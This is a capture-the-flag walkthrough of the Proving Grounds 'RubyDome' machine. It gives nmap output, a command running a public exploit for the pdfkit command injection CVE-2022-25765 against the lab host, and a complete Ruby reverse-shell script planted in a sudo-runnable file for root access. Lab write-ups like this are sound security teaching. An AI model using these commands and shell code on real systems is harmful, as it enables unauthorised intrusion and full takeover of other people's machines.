In this walk through, we will be going through the RubyDome room from Proving Grounds. This room is rated as Intermediate on the platform and it consists of exploitation of Ruby application via CVE-2022-25765 for the initial foothold. For Privilege Escalation, abuse of sudo misconfiguration on custom binary is required to get root. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | RubyDome |
IPaddress | 192.168.236.22 |
Difficulty | Easy |
OS | Linux |
Description | RubyDome is an Easy Linux machine that requires exploitation of CVE-2022-25765 for the initial foothold and exploitation of sudo misconfiguration on custom binary to get root. |
Enumeration:
- I started off with a regular nmap aggressive scan and found only two ports opened – 22 (SSH) and 3000 (HTTP).
$ sudo nmap -A 192.168.236.22 [sudo] password for wh1terose: Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-07 22:07 IST Nmap scan report for 192.168.236.22 Host is up (0.20s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) 53/tcp filtered domain 3000/tcp open http WEBrick httpd 1.7.0 (Ruby 3.0.2 (2021-07-07)) |_http-server-header: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07) |_http-title: RubyDome HTML to PDF | vulners: | cpe:/a:ruby-lang:ruby:3.0.2: | PRION:CVE-2022-28738 7.5 https://vulners.com/prion/PRION:CVE-2022-28738 | OSV:BIT-RUBY-2022-28738 7.5 https://vulners.com/osv/OSV:BIT-RUBY-2022-28738 | CVE-2022-28738 7.5 https://vulners.com/cve/CVE-2022-28738 | PRION:CVE-2021-33621 6.5 https://vulners.com/prion/PRION:CVE-2021-33621 | OSV:BIT-RUBY-2021-33621 6.5 https://vulners.com/osv/OSV:BIT-RUBY-2021-33621 | CVE-2021-33621 6.5 https://vulners.com/cve/CVE-2021-33621 | PRION:CVE-2021-41819 5.0 https://vulners.com/prion/PRION:CVE-2021-41819 | PRION:CVE-2021-41817 5.0 https://vulners.com/prion/PRION:CVE-2021-41817 | OSV:BIT-RUBY-2021-41819 5.0 https://vulners.com/osv/OSV:BIT-RUBY-2021-41819 | OSV:BIT-RUBY-2021-41817 5.0 https://vulners.com/osv/OSV:BIT-RUBY-2021-41817 | CVE-2021-41819 5.0 https://vulners.com/cve/CVE-2021-41819 | CVE-2021-41817 5.0 https://vulners.com/cve/CVE-2021-41817 | PRION:CVE-2022-28739 4.3 https://vulners.com/prion/PRION:CVE-2022-28739 | OSV:BIT-RUBY-2022-28739 4.3 https://vulners.com/osv/OSV:BIT-RUBY-2022-28739 | CVE-2022-28739 4.3 https://vulners.com/cve/CVE-2022-28739 | RUBY:RUBY-2022-28739 0.0 https://vulners.com/rubygems/RUBY:RUBY-2022-28739 | RUBY:RUBY-2022-28738 0.0 https://vulners.com/rubygems/RUBY:RUBY-2022-28738 |_ RUBY:RUBY-2021-33621 0.0 https://vulners.com/rubygems/RUBY:RUBY-2021-33621 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=2/7%OT=22%CT=1%CU=30033%PV=Y%DS=4%DC=T%G=Y%TM=65C3B1E5 OS:%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=109%TI=Z%TS=A)OPS(O1=M54EST1 OS:1NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54 OS:EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T OS:=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T OS:2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N OS:)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=D06B%RUD OS:=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 443/tcp) HOP RTT ADDRESS 1 199.68 ms 192.168.45.1 2 199.64 ms 192.168.45.254 3 200.26 ms 192.168.251.1 4 200.38 ms 192.168.236.22 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 46.61 seconds
- Enumerated the web server running on port 3000 and found out that it is running a Ruby application that converts HTML pages to PDF documents.
Initial Access:
CVE-2022–25765
- Upon further exploring for any known exploits for this. Found out that the target is running the pdfkit package that is vulnerable to CVE-2022–25765 which is a Command Injection vulnerability leading to RCE. Used the below exploit specifying the target URL and our listener port and IP. Once the exploit execution is complete, we will receive a reverse connection back at our netcat listener.
Exploit: https://github.com/UNICORDev/exploit-CVE-2022-25765
python3 exploit-CVE-2022-25765.py -s 192.168.45.215 4444 -w http://192.168.236.22:3000/pdf -p url
- Captured the local flag.
Privilege Escalation:
- Next, enumerated the sudo misconfiguration with the below command and found out that we can run the app.rb script as root without any password.
sudo -l
- I checked the permissions for the app script and found out that we can write to it. So, changed the contents of the script with the below reverse shell code.
nano app.rb
#!/usr/bin/env ruby require 'socket' require 'open3' #Set the Remote Host IP RHOST = "192.168.45.215" #Set the Remote Host Port PORT = "1234" #Tries to connect every 20 sec until it connects. begin sock = TCPSocket.new "#{RHOST}", "#{PORT}" sock.puts "We are connected!" rescue sleep 20 retry end #Runs the commands you type and sends you back the stdout and stderr. begin while line = sock.gets Open3.popen2e("#{line}") do | stdin, stdout_and_stderr | IO.copy_stream(stdout_and_stderr, sock) end end rescue retry end
- Once we execute the target binary using sudo, we will receive a reverse connection back at my netcat listener as root.
sudo /usr/bin/ruby /home/andrew/app/app.rb
- Finally, captured the root flag and marked the machine as complete.
Also Read: PG – pyLoader
Conclusion:
So that was “RubyDome” for you. We started off with a regular nmap scan and found two ports opened – 22 (SSH) and 3000 (HTTP). Enumerated the web server running on port 3000 and found out that it is running a Ruby application that converts HTML pages to PDF documents. Upon further exploring for any known exploits for this. Found out that the target is running the pdfkit package that is vulnerable to CVE-2022–25765 which is a Command Injection vulnerability leading to RCE. Used the same to get initial access on the target. For Privilege Escalation, sudo misconfiguration on custom binary was abused to get root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.